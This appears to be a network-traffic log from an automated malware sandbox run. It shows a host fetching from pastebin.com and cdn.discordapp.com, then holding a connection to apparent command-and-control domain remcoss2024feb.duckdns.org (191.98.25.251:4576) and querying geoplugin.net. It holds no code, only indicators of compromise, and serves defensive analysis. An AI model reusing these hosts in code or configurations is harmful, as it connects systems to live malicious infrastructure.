                            Jul 10, 2024 19:53:15.861941099 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.915625095 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.915642023 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.949500084 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.949585915 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.949596882 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.949615002 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.949675083 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.949688911 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.949826002 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.949887037 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.949923038 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950099945 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950120926 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950174093 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.950189114 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950216055 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.950608969 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950675964 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.950690031 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950717926 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950751066 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.950763941 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.950794935 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.951616049 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.951705933 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.951710939 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.951735973 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.951781034 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.952544928 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.952620029 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.952647924 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.952706099 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.952718019 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.953118086 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.953305960 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.953408957 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.953424931 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.997106075 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.040297985 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.040441036 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.040446997 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.040503979 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.040545940 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.040576935 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.040746927 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.040812969 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.041204929 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.041273117 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.041383982 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.041512966 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.041728973 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.041812897 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.041821957 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.041847944 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.041892052 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.042115927 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.042198896 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.042213917 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.042278051 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.042572975 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.042654037 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.042669058 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.042737961 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.043191910 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.043258905 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.043442965 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.043509960 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.043759108 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.043828011 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.044012070 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.044085026 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.044965029 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.045025110 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.045053959 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.045121908 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.045361042 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.045430899 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.045454025 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.045521975 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.045926094 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.045999050 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.046205044 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.046279907 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.046294928 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.046367884 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.131311893 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131479025 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131598949 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131638050 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.131639004 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.131715059 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131757975 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131766081 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.131854057 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.131875038 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131906033 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.131953955 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.131968975 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.132005930 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.132036924 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.132081985 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.132095098 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.132154942 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.132793903 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.132889986 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.132941008 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.133023977 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.133060932 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.133136988 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.133161068 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.133233070 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.134521008 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.134571075 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.134610891 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.134624958 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.134658098 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.134682894 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.135045052 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.135111094 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.135133028 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.135147095 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.135174036 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.136773109 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.136817932 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.136857033 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.136872053 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.136914015 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.137495995 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.137540102 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.137571096 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.137608051 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.137641907 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.138484001 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.138528109 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.138566971 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.138580084 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.138613939 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.149233103 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.222197056 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.222265005 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.222369909 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.222409010 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.222450972 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.222474098 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.223081112 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.223154068 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.223185062 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.223200083 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.223229885 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.223253012 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.223808050 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.223869085 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.223901033 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.223913908 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.223942995 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.223963976 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.225042105 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.225096941 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.225121975 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.225135088 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.225167036 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.225194931 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.225748062 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.225801945 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.225827932 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.225841045 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.225869894 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.225889921 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.227415085 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.227458000 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.227494001 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.227507114 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.227533102 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.227552891 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.228333950 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.228389025 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.228424072 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.228456020 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.228498936 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.228527069 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.229177952 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.229231119 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.229269981 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.229283094 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.229319096 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.229341030 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.312841892 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.312897921 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.312964916 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.312990904 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.313030958 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.313052893 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.313405037 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.313492060 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.313505888 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.313602924 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.313689947 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.313704967 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.314258099 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.314299107 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.314349890 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.314373970 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.314400911 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.314428091 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.315026999 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.315076113 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.315112114 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.315113068 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.315131903 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.315191984 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.315244913 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.316196918 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.316212893 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.316287041 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.316301107 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.316379070 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.316750050 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.316839933 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.317692041 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.317713976 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.317778111 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.317791939 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.318588972 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.318610907 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.318675041 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.318689108 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.319574118 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.319588900 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.319672108 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.319693089 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.319721937 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.368727922 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.404186010 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.404216051 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.404269934 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.404287100 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.404320002 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.404340982 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.404882908 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.404902935 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.404967070 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.404980898 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.405060053 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.410932064 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.410948038 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.411031008 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.411045074 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.411120892 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.411691904 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.411706924 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.411778927 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.411791086 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.411864042 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.412791967 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.412806988 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.412879944 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.412893057 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.412955046 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.413719893 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.413736105 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.413800001 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.413808107 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.413824081 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.413867950 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.413889885 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:16.413948059 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:16.414536953 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:19.240305901 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:19.245583057 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:19.245661974 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:19.250709057 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:19.255770922 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:19.940165043 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:19.993693113 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:20.100029945 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:20.104149103 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:20.109232903 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:20.109292030 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:20.114501953 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:20.553133011 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:20.554799080 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:20.560029984 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:20.705683947 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:20.759320974 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:20.767328024 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:53:20.772785902 CEST8049737178.237.33.50192.168.2.4
                            Jul 10, 2024 19:53:20.772866964 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:53:20.773017883 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:53:20.778275967 CEST8049737178.237.33.50192.168.2.4
                            Jul 10, 2024 19:53:21.409580946 CEST8049737178.237.33.50192.168.2.4
                            Jul 10, 2024 19:53:21.409687042 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:53:21.423008919 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:21.429430962 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:22.413269997 CEST8049737178.237.33.50192.168.2.4
                            Jul 10, 2024 19:53:22.413398027 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:53:30.278115034 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:53:30.279419899 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:53:30.284357071 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:54:00.306638002 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:54:00.308413029 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:54:00.313468933 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:54:30.322587967 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:54:30.323865891 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:54:30.329488039 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:55:00.399805069 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:55:00.401294947 CEST497364576192.168.2.4191.98.25.251
                            Jul 10, 2024 19:55:00.407737970 CEST457649736191.98.25.251192.168.2.4
                            Jul 10, 2024 19:55:10.744184971 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:55:11.150265932 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:55:11.837647915 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:55:13.150178909 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:55:15.634526014 CEST4973780192.168.2.4178.237.33.50
                            Jul 10, 2024 19:55:20.447056055 CEST4973780192.168.2.4178.237.33.50
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 10, 2024 19:53:08.783704996 CEST5869753192.168.2.41.1.1.1
                            Jul 10, 2024 19:53:08.791393042 CEST53586971.1.1.1192.168.2.4
                            Jul 10, 2024 19:53:14.956657887 CEST5364953192.168.2.41.1.1.1
                            Jul 10, 2024 19:53:14.964159012 CEST53536491.1.1.1192.168.2.4
                            Jul 10, 2024 19:53:16.514507055 CEST5636353192.168.2.41.1.1.1
                            Jul 10, 2024 19:53:17.535249949 CEST5636353192.168.2.41.1.1.1
                            Jul 10, 2024 19:53:18.548012972 CEST5636353192.168.2.41.1.1.1
                            Jul 10, 2024 19:53:19.236865044 CEST53563631.1.1.1192.168.2.4
                            Jul 10, 2024 19:53:19.236913919 CEST53563631.1.1.1192.168.2.4
                            Jul 10, 2024 19:53:19.236947060 CEST53563631.1.1.1192.168.2.4
                            Jul 10, 2024 19:53:20.755445957 CEST6544453192.168.2.41.1.1.1
                            Jul 10, 2024 19:53:20.763962030 CEST53654441.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 10, 2024 19:53:08.783704996 CEST192.168.2.41.1.1.10xc5c4Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:14.956657887 CEST192.168.2.41.1.1.10xe51dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:16.514507055 CEST192.168.2.41.1.1.10x49Standard query (0)remcoss2024feb.duckdns.orgA (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:17.535249949 CEST192.168.2.41.1.1.10x49Standard query (0)remcoss2024feb.duckdns.orgA (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:18.548012972 CEST192.168.2.41.1.1.10x49Standard query (0)remcoss2024feb.duckdns.orgA (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:20.755445957 CEST192.168.2.41.1.1.10x472dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 10, 2024 19:53:08.791393042 CEST1.1.1.1192.168.2.40xc5c4No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:08.791393042 CEST1.1.1.1192.168.2.40xc5c4No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:08.791393042 CEST1.1.1.1192.168.2.40xc5c4No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:14.964159012 CEST1.1.1.1192.168.2.40xe51dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:14.964159012 CEST1.1.1.1192.168.2.40xe51dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
